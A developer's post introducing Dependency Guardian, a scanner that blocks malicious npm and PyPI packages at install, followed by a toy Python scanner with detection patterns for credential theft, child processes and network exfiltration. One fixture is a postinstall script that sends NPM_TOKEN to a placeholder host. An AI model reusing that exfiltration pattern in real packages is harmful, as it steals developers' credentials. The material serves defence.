Dependency Guardian - Supply chain protection that blocks malware at install

Static supply chain scanner catches npm & PyPI attack patterns CVE databases miss: install scripts, credential theft, child process spawning, network exfil. 100 detectors, sandbox routing for eligible packages, GitHub App + CLI. Free plan.

I've been building a tool called Dependency Guardian, and I'm looking for developers and security engineers to try it out. I built it because I wanted protection from malicious npm and PyPI packages without changing how I work. When I went looking for something that already did this, I noticed traditional CVE-based scanning had a blind spot: it only catches problems after they've been reported and assigned a CVE, which leaves a window where a malicious package can spread before anyone flags it.

The tool sits in front of package installs and inspects everything that actually lands on your machine, analyzing packages for suspicious behavior and supply chain risk signals before they install.

A few things it does:

- Aliases to npm install and pip, so you keep using the commands you already know
- Returns a warn, block, or pass, and prompts on ambiguity
- Runs as both a GitHub App and a CLI

I'd really like feedback from engineers who work with Node, Python, or dependency security. What would stop you from trusting a tool like this? And what would make it useful enough to run every day?
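To make the warn/block/pass idea concrete, here is a small static scanner of the kind described above (install-script, credential-access, child-process and network detectors combined into a verdict). It is an added example, not Dependency Guardian's code; the detector regexes, the escalation rule and the two sample packages are constructed for illustration.

```python
"""Toy static scanner over unpacked npm package contents (added example).
Input is a dict {path: text}; output is ("pass"|"warn"|"block", findings)."""
import json
import re

# Constructed detector table: (name, severity, pattern). Real tools use far more.
DETECTORS = [
    ("child-process", "block",
     re.compile(r"require\(['\"]child_process['\"]\)|\bexecSync\(|\bspawn\(")),
    ("credential-access", "warn",
     re.compile(r"process\.env\.(NPM_TOKEN|AWS_[A-Z_]+|GITHUB_TOKEN)|\.npmrc|\.aws/credentials")),
    ("network-exfil", "warn",
     re.compile(r"\bhttps?\.request\(|\bfetch\(|new\s+WebSocket\(")),
]
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

def analyze(files):
    """Scan package.json lifecycle hooks and every .js file; return verdict + findings."""
    findings = []
    pkg = json.loads(files.get("package.json", "{}"))
    hooks = [h for h in INSTALL_HOOKS if h in pkg.get("scripts", {})]
    if hooks:
        findings.append(("install-script", "warn", "hooks: " + ", ".join(hooks)))
    for path, text in files.items():
        if path.endswith(".js"):
            for name, sev, rx in DETECTORS:
                if rx.search(text):
                    findings.append((name, sev, path))
    names = {name for name, _, _ in findings}
    # Escalation: code that runs at install time AND touches secrets, the
    # network or a shell is the classic exfil shape, so it blocks outright.
    if "install-script" in names and names & {"credential-access", "network-exfil", "child-process"}:
        return "block", findings
    if any(sev == "block" for _, sev, _ in findings):
        return "block", findings
    return ("warn" if findings else "pass"), findings

# Constructed sample: postinstall reads a token and POSTs it to a placeholder host.
SUSPICIOUS = {
    "package.json": json.dumps({"name": "example-pkg", "scripts": {"postinstall": "node setup.js"}}),
    "setup.js": ("const https = require('https');\nconst t = process.env.NPM_TOKEN;\n"
                 "https.request({host: 'example.invalid', method: 'POST'}).end(t);\n"),
}
# Constructed sample: an ordinary library with no lifecycle hooks or risky calls.
CLEAN = {
    "package.json": json.dumps({"name": "tiny-lib", "main": "index.js"}),
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
}

if __name__ == "__main__":
    for label, pkg in (("suspicious", SUSPICIOUS), ("clean", CLEAN)):
        print(label, analyze(pkg))
```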